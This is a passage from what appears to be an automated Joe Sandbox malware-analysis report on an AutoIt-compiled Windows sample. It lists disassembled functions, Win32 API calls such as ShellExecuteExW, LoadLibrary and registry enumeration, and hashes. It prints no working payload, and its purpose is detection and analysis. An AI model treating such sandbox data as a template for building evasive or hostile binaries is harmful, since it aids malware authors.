                                                                    • Instruction Fuzzy Hash: 67F03AB3254159BBE7215B629C4EEEF3A7CEFCAB11F00016CF605E1091D7A05A41EAB5
                                                                    Function 00937439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?), ref: 00937452
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00937469
                                                                    • GetWindowDC.USER32(?), ref: 00937475
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00937484
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00937496
                                                                    • GetSysColor.USER32(00000005), ref: 009374B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                    • String ID:
                                                                    • API String ID: 272304278-0
                                                                    • Opcode ID: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                    • Instruction ID: 9b423d4044abf64a70d33b3e0a1a1253786db9518bc33ee00e1a9303da0b3a3b
                                                                    • Opcode Fuzzy Hash: c34f495e5ba5ca863bafcae2915276984cb084b464639bb17b37d71cc6d6c381
                                                                    • Instruction Fuzzy Hash: 3F014F72418219FFDB515FA4DC48BA97BB6FB04311F510168F919A21B1CB312E91BF51
                                                                    Function 00941874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094187F
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0094188B
                                                                    • CloseHandle.KERNEL32(?), ref: 00941894
                                                                    • CloseHandle.KERNEL32(?), ref: 0094189C
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 009418A5
                                                                    • HeapFree.KERNEL32(00000000), ref: 009418AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                    • Instruction ID: d6169b2d596888b83cda1afb1395608277df9c0f27a95f3f8510b51d1f670831
                                                                    • Opcode Fuzzy Hash: fe22a4cc0e2054f883077bfe5d3bf4672b462f242891b4b90d1b036c70b3721c
                                                                    • Instruction Fuzzy Hash: 3DE0E5B701C101FBEB015FA1ED0C90ABF39FF89B22B508228F22991470CB3294A0EF50
                                                                    Function 0094C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C6EE
                                                                    • _wcslen.LIBCMT ref: 0094C735
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094C79C
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0094C7CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                    • String ID: 0
                                                                    • API String ID: 1227352736-4108050209
                                                                    • Opcode ID: b32e44a873d7d084deeb94e20c825739656d2fefda1ee16e88518447ab023505
                                                                    • Instruction ID: c8d52c84b7b306cce4ca676622aeeff638cf07c3e1193226cfe6c989629494ad
                                                                    • Opcode Fuzzy Hash: b32e44a873d7d084deeb94e20c825739656d2fefda1ee16e88518447ab023505
                                                                    • Instruction Fuzzy Hash: 3151EFB161A3419FD7949F28C885F6B77E8EF89324F040A2DF995E32A1DB74D804CB52
                                                                    Function 0096AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0096AEA3
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • GetProcessId.KERNEL32(00000000), ref: 0096AF38
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096AF67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 146682121-1426351568
                                                                    • Opcode ID: a7f42126314d095cf056a64bbf7d00c1db0b9df2a78f744c6463f50d6fe51b34
                                                                    • Instruction ID: cfbad4b00f167b02108afbf53b99f1e83fd0ef9170ec274f571bc23261c93fbb
                                                                    • Opcode Fuzzy Hash: a7f42126314d095cf056a64bbf7d00c1db0b9df2a78f744c6463f50d6fe51b34
                                                                    • Instruction Fuzzy Hash: 74715671A00659DFCB14DF59C484A9EBBF4FF09310F048499E816AB2A2CB75ED41CF92
                                                                    Function 0094719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00947206
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094723C
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094724D
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009472CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                    • Instruction ID: 19778c8dc50477840aac7e7da2094d7dec5597f3dd62d06e362b127996564bb2
                                                                    • Opcode Fuzzy Hash: f7e3344f650046beed7514d0f5b004a4e26c2f75b66901908d4bdfa278bb3542
                                                                    • Instruction Fuzzy Hash: 714171B1604208DFDB15CFA4C884E9ABBA9EF44314F1480ADBD199F20AD7B4D944CBA0
                                                                    Function 00973D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973E35
                                                                    • IsMenu.USER32(?), ref: 00973E4A
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973E92
                                                                    • DrawMenuBar.USER32 ref: 00973EA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                    • Instruction ID: 5911064d1dded37fa25b8846f694ac9c6b1a3f9b23827ddb4a16630d59770084
                                                                    • Opcode Fuzzy Hash: c4044b418f95750e22310691c16ba1cbb76717dab4616c2f924a753c9c2fba03
                                                                    • Instruction Fuzzy Hash: 19415976A15209EFDB10DF50D884EAABBB9FF49364F04C12AF909A7250D730AE44EF50
                                                                    Function 00941DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00941E66
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00941E79
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00941EA9
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2081771294-1403004172
                                                                    • Opcode ID: 8f5a232e00ee7b26464f5392b9dd05a2ddd652e3ec6ff91a91d086269dc2e9af
                                                                    • Instruction ID: c3859a0173b44547a87343a99f75bfd48df52c2b2b7574ed0c0c61910edab79a
                                                                    • Opcode Fuzzy Hash: 8f5a232e00ee7b26464f5392b9dd05a2ddd652e3ec6ff91a91d086269dc2e9af
                                                                    • Instruction Fuzzy Hash: 78213775A00104BADB14AB75DC85CFFB7B8EF82350B104519F815E71E1EB74498A9620
                                                                    Function 0096C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                    • API String ID: 176396367-4004644295
                                                                    • Opcode ID: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                    • Instruction ID: ed1ddfbab9e946fcc460f9c81827921757d13cc9cc16e1d1098abe4a63c4dc58
                                                                    • Opcode Fuzzy Hash: cb4bb3eff2472ff836d2430976c3cfe7196111a6da04db666e76c7038d1d1e15
                                                                    • Instruction Fuzzy Hash: 9F3106F3A005694BCB30EFECC9411BE33999BA2790B454129FCD5AB345EA70CD80D3A1
                                                                    Function 00972F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00972F8D
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00972F94
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00972FA9
                                                                    • DestroyWindow.USER32(?), ref: 00972FB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                    • Instruction ID: 2d0124c833bce2d89b2855b5b6f8a39ba720617d2794c3338ad1ad3342213d3c
                                                                    • Opcode Fuzzy Hash: f35e2821e378fb64ae3af0968a26ab7edec880d30248b9e411d35a1884cd6e7d
                                                                    • Instruction Fuzzy Hash: 4D219D73224205ABEF104FA8DC80FBB77BDEB59368F108619F958D61A0E771DC91A760
                                                                    Function 00904D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002), ref: 00904D8D
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00904DA0
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00904D1E,009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000), ref: 00904DC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                    • Instruction ID: ffffc7d5d35b6daca47e2f7ccd002f83d141fbb79a07c5b35e9585bbda0c1851
                                                                    • Opcode Fuzzy Hash: c3ceabb61ff9010c04ecc7de6328c029822298c5aef8496c6e7f48482411b226
                                                                    • Instruction Fuzzy Hash: DBF044B5654218BFDB115F90DC49B9DBBB9EF84755F440068F909A6290CB305980DBD1
                                                                    Function 008E4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-3689287502
                                                                    • Opcode ID: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                    • Instruction ID: 3a7c49da479804d1eb22208e8526c92651fdff3d2d1f22b67394168339ef732f
                                                                    • Opcode Fuzzy Hash: f87133e4e20f0d6e24875599087c6cc5c28e90ccec15a5d8060f75dd525dc2a5
                                                                    • Instruction Fuzzy Hash: EFE08677A195636B93311B266C19A5F6654FFC2F72B054129FC0CD2100DB60CD4195A0
                                                                    Function 008E4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-1355242751
                                                                    • Opcode ID: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                    • Instruction ID: fca82a301852679e8a2f8e8c6f684d839d8763daa54e53cec73b6b9b7c834c37
                                                                    • Opcode Fuzzy Hash: 4b9aea0984dafbc5688e3be74f6a1a55233ea88b19c55acdaf3761dac4326d5f
                                                                    • Instruction Fuzzy Hash: 09D0C27391A6625746221B266C08D8F6A18FF8AF253894128B80CE2110CF20CD41D5D0
                                                                    Function 0096A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 0096A427
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096A435
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096A468
                                                                    • CloseHandle.KERNEL32(?), ref: 0096A63D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 3488606520-0
                                                                    • Opcode ID: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                    • Instruction ID: 2ae8deb4cec532c333b0b8b64543391b2095ea3f466bcbea7ef4e59dcdfef31d
                                                                    • Opcode Fuzzy Hash: c9d60ea8984b627871a9167d17a50900014d0d62999570dc9befa4d51e8fc026
                                                                    • Instruction Fuzzy Hash: 12A16C71604301AFD720DF29D886B2AB7E5EF84714F14885DF59ADB392DBB0EC418B92
                                                                    Function 0094E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0094E473
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094E4AC
                                                                    • _wcslen.LIBCMT ref: 0094E5EB
                                                                    • _wcslen.LIBCMT ref: 0094E603
                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0094E650
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3183298772-0
                                                                    • Opcode ID: 9f6c1766c7a2a44c2da834fc5e14c38b8862c44e0171a55c23eba1802a0cfa4b
                                                                    • Instruction ID: e9473261fdd93ba8545e45f322a37ad79ed80da8d2733ac3c4d63a618d192773
                                                                    • Opcode Fuzzy Hash: 9f6c1766c7a2a44c2da834fc5e14c38b8862c44e0171a55c23eba1802a0cfa4b
                                                                    • Instruction Fuzzy Hash: 415142B25083859FC724EB94D881EDB73ECAFC5344F00492EF589D3191EF74A6888B66
                                                                    Function 0096B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BAA5
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BB00
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0096BB63
